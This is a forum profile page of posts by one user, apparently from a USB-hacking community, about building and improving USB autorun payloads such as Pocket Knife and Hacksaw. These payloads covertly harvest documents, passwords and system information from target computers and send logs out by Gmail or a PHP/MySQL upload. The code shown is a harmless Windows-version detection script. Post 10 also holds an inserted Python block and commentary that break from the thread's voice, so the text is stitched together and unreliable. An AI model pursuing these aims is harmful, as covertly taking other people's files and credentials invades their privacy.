
DMilton

Active Members
  • Posts

    132

Posts posted by DMilton

  1. This project is freezing, someone's gotta release VER 9, grr.

    In fact, I'm waiting for version 9 for something else I'm developing, but without Leapo... we can still continue developing this stuff. The first thing we have to do is read the forum; there are very interesting things we can add to the payload, such as the MySQL+PHP way of sending the logs (and not only this). Moreover, some of us can contribute new ideas, but a working group is needed, and a base on which to develop is needed too.

    Where's Leapo? :lol:

    If he wants to continue his work, as he said a couple of weeks ago, I'll be glad to contribute the little I can; if he doesn't... I'll wait!

  2. Hey man, cool work. I just had a brain wave. Okay, to be honest, we are not going to do a 3-second configure when we are about to attack a computer. We are going to set up the payload the day/night before, using a comp on which, more than likely, we have .Net Framework installed.

    (no attack intended @DMilton)

    Don't worry man, I don't feel attacked at all. Only one observation... Imagine you have to plan your attack in 3 seconds. One situation, one solution!

    I don't want to annoy alexthedrifter at all; in fact his work deserves applause. But if this is your situation (probably, if I answered, it is because it's mine), you have to act as soon as possible, as fast as possible, and you probably don't have time to install .NET at all (if it is even possible). :(

    Anyway, good work!

  3. Well, I'm developing my own payload because Pocket Knife doesn't work like it should; I was discussing it inside that thread.

    The OS recognition fails if Windows is not English; that's why I was thinking about finding "(x86)" in the Program Files path, although I'm not sure if it's universally named with (x86) in every language.

    Sorry, I posted you the incorrect link...

    For a system in any language, you can do this.

    For all-languages OS detection, if you modify:

    REM find returns errorlevel 0 when the text is found and 1 when it is not,
    REM so each jump is taken on "not errorlevel 1" (string found).
    ver|find "[Version 5.00." >nul
    if not errorlevel 1 goto SetOSwin2k
    ver|find "[Version 5.1." >nul
    if not errorlevel 1 goto SetOSXP32
    ver|find "[Version 5.2." >nul
    if not errorlevel 1 goto SetOSXP64
    ver|find "[Version 6.0." >nul
    if not errorlevel 1 goto SetOSVISTA32
    REM find matches literally (no wildcards), so "6.???" never matches and
    REM anything not recognised above falls through to SetOSDefault.
    ver|find "[Version 6.???" >nul
    if not errorlevel 1 goto SetOSVISTA64
    :SetOSDefault
    goto SetOSXP32
    :SetOSwin2k
    SET CurrentOS=win2k
    GOTO EndDetect
    :SetOSXP32
    SET CurrentOS=XP32
    GOTO EndDetect
    :SetOSXP64
    SET CurrentOS=XP64
    GOTO EndDetect
    :SetOSVISTA32
    SET CurrentOS=VISTA32
    GOTO EndDetect
    :SetOSVISTA64
    SET CurrentOS=VISTA64
    GOTO EndDetect
    :EndDetect

    The code will not work for Spanish systems (or others, I suppose), because the ver command shows lines as "Versión 5.00....". You can modify the code with:

    REM Only the numeric part is searched, so the localized label ("Version",
    REM "Versión", ...) no longer matters. find returns errorlevel 0 when the
    REM text is found and 1 when it is not, so each jump is taken on
    REM "not errorlevel 1" (string found).
    ver|find "5.00." >nul
    if not errorlevel 1 goto SetOSwin2k
    ver|find "5.1." >nul
    if not errorlevel 1 goto SetOSXP32
    ver|find "5.2." >nul
    if not errorlevel 1 goto SetOSXP64
    ver|find "6.0." >nul
    if not errorlevel 1 goto SetOSVISTA32
    REM find matches literally (no wildcards), so "6.???" never matches and
    REM anything not recognised above falls through to SetOSDefault.
    ver|find "6.???" >nul
    if not errorlevel 1 goto SetOSVISTA64
    :SetOSDefault
    goto SetOSXP32
    :SetOSwin2k
    SET CurrentOS=win2k
    GOTO EndDetect
    :SetOSXP32
    SET CurrentOS=XP32
    GOTO EndDetect
    :SetOSXP64
    SET CurrentOS=XP64
    GOTO EndDetect
    :SetOSVISTA32
    SET CurrentOS=VISTA32
    GOTO EndDetect
    :SetOSVISTA64
    SET CurrentOS=VISTA64
    GOTO EndDetect
    :EndDetect

    It will work for OSes in all languages. ;)

    Posted here!

  4. btw, can anyone provide a tutorial on how to put this into our payload?

    This can be easily implemented into everyone's payload, but if the idea is doing it in Leapo's Pocket Knife, it will be very easy, of course.

    Maybe Leapo will do it, or if he wants, I'll write (with Tcstool's permission ;)) the code to run from Leapo's Pocket Knife for his next release!

    The only thing you have to do is add the apps to the SYSTEM folder and modify the

    >> %1\output\...

    to Leapo's output log file.

    But in this stuff I think there are some things, such as MD5SUM or exporting the entire Registry, that in Leapo's will not be very useful (not as in other payloads oriented to security audits).

    Leapo: What about it?

  5. I'm having problems installing Hacksaw on my USB U3 drive, and I need all the help I can get as this is kind of important.

    I'm new to this and I have no idea what I'm doing wrong, and am kind of annoyed at trying to make it work and getting nowhere :P

    So, here's what I am doing:

    1. Download Hacksaw from http://www.usbhacks.com/2006/10/07/usb-hacksaw/

    2. Unzip the file to my desktop

    3. Insert my U3 drive

    4. Follow the readme.txt

    4i. Run the LP starter, all goes OK

    4ii. Now here is where I'm having problems. In the readme file it says you have to edit the send.bat file to put in the Gmail address and move it to the root of your flash drive. Problem is, I open the payload\WIP\SBS file and all the files are hidden and I can't edit it. (I tried everything to unhide the files but failed.)

    Can anyone help me out? Maybe take me through all the steps and all that; I'd appreciate it a lot :)

    -raffi

    The only thing you have to do is allow the system to show hidden files (go to "My PC", "Folder Options"; here you have to allow seeing hidden files and folders...).

    How about trying it with SOL(Send Outgoing Log) instead of that gmail crap!

    Do you really want to expose your Gmail password? If you're going to use a skiddie tool, count on being found out. At least if you use something that doesn't reveal passwords... (like SOL), at least you won't get pwned ;)

    The idea is to pwn without being pwned yourself! It's like saying here's my Gmail password, just sitting in an unencrypted plain text file! Come and get it! lol

    Truly, no one wants his Gmail account password to be exposed, but as ravc told us... he's new to this, and your SOL solution (the MySQL+PHP way) is much better, but not implemented in any payload yet, such as Leapo's or GonZor's (for example), nor in yours or mine or those of people with some basic level in these materials...

  6. Well usually people beat me to the punch so I don't post. I also forgot about the forums lol.

    And good point about the security guru/eBay problem. The reason I brought the idea up is so that someone like you would recognize the dangerous potential this could lead to and the outcome of it. I hope this warns readers out there that they should not attempt this in any way!

    What a dirty job is this? :lol: I think no one is so... foolish? as to do it, eBaying them or selling them in a marketplace... But the idea is planning over my own fried mind! :blink:

    As you do, I hope "this" warns readers out there against doing nonsense like this...

  7. Good job Tcstool! I think it would be great to add this to the wiki... You're not responsible for whether the final user is using it in a white hat way or not, but I found it useful.

    As HarshReality said, a list of installed printers and their properties would be very useful too.

  8. Hey, I have (another) question, and also an idea.

    The question...when I put the flash drive in computers with Windows 2000, 9 times out of 10 a message will pop up saying there's some sort of error with "wscript.exe," and it says to "please ensure that a floppy is drive A:." Now, this may be a problem due to the fact that these are being used on computers which previously had floppy drives, but were removed and disabled in the BIOS. Not sure why PocketKnife would cause an error having anything to do with floppies though, and I do not know what "wscript.exe" specifically means. This isn't a very big problem, since the payload still runs fine, just...I have to exit the error every time I put it in one of their computers, except for like 1 or 2 computers.

    The solution is modifying GO.VBS. In this thread is the solution by mencargo...

    Second, the suggestion. The slurp application info is a very nice idea. I know it can take time, but slurping little bits and pieces of info like that is just helpful. However, what would make it even better is if it would also capture Notepad and possibly Word files that don't have much text in them. People often put passwords or private pieces of information in Notepad files. So, maybe it should capture all Notepad files that have, say, fewer than 40 words in them, or X amount of characters, or whatever.

    I'm not sure if this would be hard to code, and also, I'm thinking that if it has to search the whole computer for them it may take a long time to run, so maybe it could just search the Desktop and Documents folders.

    In my case, I don't think I'll use this way of slurping, but if it can be useful for more people, I could try to script it... Anybody?

    In any case, the time it consumes would probably make the slurping action not very efficient. It will probably be better to slurp all the .txt, .doc, .rtf files...

  9. You don't have to remove GonZor's. The only thing you have to do is install the new version the same way you installed the previous one. It will replace the version with the new one.

  10. Hi there, I'm searching for a way to detect if the host OS is 64-bit or 32-bit.

    Is there any environment variable for this? (Available from MS-DOS)

    Or any way to detect it with a VBS script?

    I was thinking something like:

    ver|find /c "X.X."

    or

    echo %programfiles%|find /c "(x86)"

    And, just curiosity, why do some usb payloads use "%windir%\system32\find.exe"?

    Isn't find available as default everywhere?

    Try this. It was implemented into Leapo's Pocket Knife and it works. ;)
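    The locale problem from post 3 and the 32/64-bit question from post 10 can be checked in one place. The following is an added example, not code from the thread, from Pocket Knife, or from any of its authors: it extracts the dotted version number from `ver` output regardless of the localized label, maps it to the same CurrentOS labels the batch code above uses, and separates 32- from 64-bit (which `ver` alone cannot do for Vista) using environment variables. The `ver` strings are constructed samples for several locales; PROCESSOR_ARCHITEW6432 and PROCESSOR_ARCHITECTURE are variables Windows itself sets, and the "(x86)" test on ProgramFiles is the heuristic the thread proposes, kept as a fallback because, as post 3 notes, the suffix is not guaranteed in every localized edition. Function names are my own.

```python
import os
import platform
import re
import subprocess
from typing import Dict, Optional

# Constructed sample `ver` outputs for several locales (not captured from
# real machines). The localized label before the number changes; the
# dotted version number does not, which is what the post relies on.
SAMPLE_VER_OUTPUTS = {
    "en-2000":  "Microsoft Windows 2000 [Version 5.00.2195]",
    "es-XP":    "Microsoft Windows XP [Versión 5.1.2600]",
    "en-2003":  "Microsoft Windows [Version 5.2.3790]",
    "fr-Vista": "Microsoft Windows [version 6.0.6002]",
    "en-7":     "Microsoft Windows [Version 6.1.7601]",
}

# Same version prefixes and labels as the batch code in post 3.
VERSION_PREFIX_TO_OS = [
    ("5.00.", "win2k"),
    ("5.1.", "XP32"),
    ("5.2.", "XP64"),      # XP x64 and Server 2003 both report 5.2
    ("6.0.", "VISTA"),     # 32- vs 64-bit is NOT visible in `ver`
]

# First dotted triple of digits anywhere in the line, whatever the label says.
VERSION_RE = re.compile(r"(\d+\.\d+\.\d+)")


def extract_version(ver_output: str) -> Optional[str]:
    """Return the dotted version from `ver` output, ignoring the localized
    "Version"/"Versión"/"version" label, or None if no version is present."""
    match = VERSION_RE.search(ver_output)
    return match.group(1) if match else None


def classify_os(ver_output: str) -> str:
    """Map `ver` output to the labels used in the thread's batch code."""
    version = extract_version(ver_output)
    if version is None:
        return "unknown"
    for prefix, label in VERSION_PREFIX_TO_OS:
        if version.startswith(prefix):
            return label
    return "unknown"


def is_64bit_windows(env: Dict[str, str]) -> bool:
    """64-bit check from environment variables, as post 10 asks for.

    PROCESSOR_ARCHITEW6432 is set by Windows only when a 32-bit process runs
    under WOW64 on a 64-bit system; PROCESSOR_ARCHITECTURE reports the
    architecture seen by a native process. The "(x86)" test on ProgramFiles
    is the thread's heuristic, used last because the suffix is not
    guaranteed in every localized edition (assumption noted in post 3).
    """
    upper = {k.upper(): v for k, v in env.items()}
    if upper.get("PROCESSOR_ARCHITEW6432"):
        return True
    if upper.get("PROCESSOR_ARCHITECTURE", "").upper() in ("AMD64", "IA64", "ARM64"):
        return True
    return "(x86)" in upper.get("PROGRAMFILES", "")


def detect(ver_output: str, env: Dict[str, str]) -> str:
    """Combine both signals into a CurrentOS-style label."""
    base = classify_os(ver_output)
    if base == "VISTA":
        return "VISTA64" if is_64bit_windows(env) else "VISTA32"
    return base


def detect_local() -> str:
    """Run the detection on this machine; only meaningful on Windows."""
    if platform.system() != "Windows":
        return "unknown"
    out = subprocess.run(["cmd", "/c", "ver"], capture_output=True, text=True).stdout
    return detect(out, dict(os.environ))


if __name__ == "__main__":
    for name, line in SAMPLE_VER_OUTPUTS.items():
        print(f"{name:9} -> {classify_os(line)}")
    print("this host -> " + detect_local())
```

    Note that Windows 7 (6.1) deliberately comes out as "unknown": the batch code's literal "6.???" never matches, and neither table knows 6.1, so a newer release falls to the default branch rather than being mislabelled. Anyone extending the table should add a prefix per release rather than relying on a wildcard `find` does not support.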

  11. Slurp3? I didn't know one existed xD. The framework requirement is by default in VB 2008 Express; any idea on how to edit this it would be thanked.

    No, I'm sorry... I don't know how to do it without using .NET Framework.

    The Slurp3 method (I named it Slurp3 because Slurp1 and Slurp2 already exist) is a way of slurping only desired files from My Documents, Desktop, Shared Documents and Shared Desktop (similar to Slurp2 but more attack-oriented); it can substitute for it too. It's not implemented yet, but I think Leapo will do it. It uses a plain text file (wanted.txt from the \SYSTEM dir), editable for slurping files by extension (*.jpg, *.doc, etc.). It can slurp all files too (by editing wanted.txt and adding *.* to it). You can find more information in the Pocket Knife Payload thread here.

  12. You probably haven't seen it since it's low on the second page now.

    http://hak5.org/forums/index.php?showtopic=9644

    It's almost guaranteed that port 80 is open, and it's the most undetectable method. Therefore I think it's the best way.

    Have you thought about adding this to the wiki, and maybe a brief "How to"? I found this thread a few days ago and found it really useful (voted PHP+HTTP+SQL). I know it's the same thing some backdoors do too, but the benefits in this stuff are really great.

    What would happen if the connection is not active, or if it's interrupted while a log (or slurped files) is being uploaded?

    Note: I don't know if I have posted in the correct place... Maybe I should have done it in the other thread... :mellow:

  13. And finally, I'd just like to speak up about the method of payload development that's been going on in this thread. It is very, very confusing that multiple people are making multiple updates to Leapo's payload. A GUI, bug fixes, etc. It's impossible for anyone to keep up.

    First of all, if we wanted to develop an independent payload, we surely would. I have my own payload, of course, as many of us have. But the final purpose of posting in this Pocket Knife thread is precisely to help Leapo in developing his payload. This stuff doesn't belong to Leapo, but to the entire community.

    But if Leapo made the effort to compile in a batch a compendium of other scripts, and tried to improve them, it is because, probably, he had an altruistic thought.

    The reason for posting is, precisely, helping in developing his first (and now very evolved) code. Without the collaboration of many people (I would not name anyone, so as not to forget anyone), he probably would have left this project.

    But don't forget that if you, me (or someone else) post code trying to update the code, it is, surely, because we want to collaborate and, of course, to make readers understand the code and share knowledge.

    But the last one who has to update his code is Leapo. By the way, we can only try to help.

    In fact, I personally believe having independent payloads in general is bad. Leapo had the right idea; a payload with just about everything. People have been working with Leapo on this payload to make it a fusion of the best ideas and features, and that's been working, but I understand that he's been inactive for a while and people are taking it upon themselves to edit it and add/edit things to make it better. I know that he hasn't been on in a while, but I feel that things would be simpler and better for everyone if they simply collaborated with Leapo and worked on it with him, so there's only one version of Leapo's payload. Unless he does not plan on updating it any time in the next 2 months, or has quit, then people should just be working with him.

    In fact, me too, but as you see, if someone wants to make an independent payload, he does it in an independent thread... If you refer to someone who is developing a GUI, surely, if Leapo sees that, he will contact him/them (and vice versa) to work hand in hand. If the author of a GUI shows us (by publishing the code) how he did it, surely it'll be useful, because it's one less thing to do (or one more thing to improve! :blink:). Those who don't want to be "one more" but "The One" have no place in this forum...

    Finally, I don't know if he is planning on updating the payload, probably yes (he said so a few days ago), but also probably he has other things to do (as many of us). In second place, there are many things to do, many improvements to implement and many others to investigate. Then, let Leapo decide if he wants to do it, and let others decide if we want to use his code (as I do), helping him in its development and others in understanding how it works. I remember GonZor did the same a long, long time ago (sigh!), and the response to him was the same as for Leapo; in fact I remember many people helping with GonZor's stuff (I will not say names).

    As far as I know, Leapo has always appreciated contributions, so be sure, when he can read the posts, recompile, compile and rebuild his code, he'll do it. Otherwise, I'm sure he'll pass the baton...

    Meanwhile, I will be waiting for his answers and learning more things (there are some very good threads here and in other communities), and the development of this kind of stuff will surely stay alive, with or without Leapo (better with).

    Everybody knows that Leapo began this thread and did the first re-compilation, re-compiled from other re-compilations, searching for code from other anonymous people (and not anonymous ones), and those from others... till the beginning of time... :P There's nothing new in doing so, but it is work to do it.

    Can you contribute? Perfect, do it...

    We'll still be waiting for the next release, with or without GUI... (Better with)

  14. I'll be testing it this week...

    First question: why must we use .NET Framework? Sorry if this question is so simple, but I think, if we want to run it on a computer without .NET Framework, we must install it. What happens if we have only a couple of seconds to configure the payload?

    I don't want to compromise you, but you surely will understand what I'm trying to say...

    I'll be waiting for the source code, as DingleBerries is too.

    Haven't you implemented the Slurp3 code?

    Have you worked on a clean installation of the Pocket Knife or an updated one?

    By the way, only one more thing to say: GREAT WORK!

  15. Anyone wanna give me an update on what happened in the last 3 days? Too much stuff to read, please.

    Some of the readers have decided to create a GUI for Windows, a non-MS-DOS GUI (Elmer, alexthedrifter and mencargo). :lol: Some others of us are interested in it, helping with what we can.

    In fact, alexthedrifter has released an ALPHA-BETA :P version GUI (Look for new posts).

    Some new implementations for the Payload (Slurp3 proof of concept).

    Some issues Verye had with the payload's auto-run and how Windows manages file extensions were solved.

    That's all :blink:

  16. Hey peeps

    Well, I bought myself a Cruzer Titanium pen drive to mostly store documents on; however, I decided to password protect it and have come back to my desk to realise I have totally forgotten the password :(

    Just wondering if anyone knows a method of getting into these before I an hero, as I just wrote & saved a Word document within it.

    Cheers

    Probably you must do it by formatting the pen drive again... :angry:

  17. I have seen it, it's a GUI.

    My concept of what you should see when you open the GUI is a list of checked/unchecked boxes to activate or not each piece of stuff. If you use only buttons, you cannot know the state of each sub-payload.

    But for the moment, till he implements more things, it looks like alexthedrifter is doing good work. ;)

    Yes, yes, yes, yes, I know, it's a BETA...

  18. Well, I'm saying the flaw is that auto-play was disabled by default. Meaning, the person would be immune from attacks without even knowing what auto-play WAS.

    Also, what's with that GO.vbs error I kept getting?

    With the GO.vbs file, don't worry, it's a known error probably caused by a badly assigned variable in the vbs file (fixed a few posts before); problems are not persecuting you...

    [user]mencargo[/user] posted a solution for it here. Probably it will be fixed by Leapo in the next release.
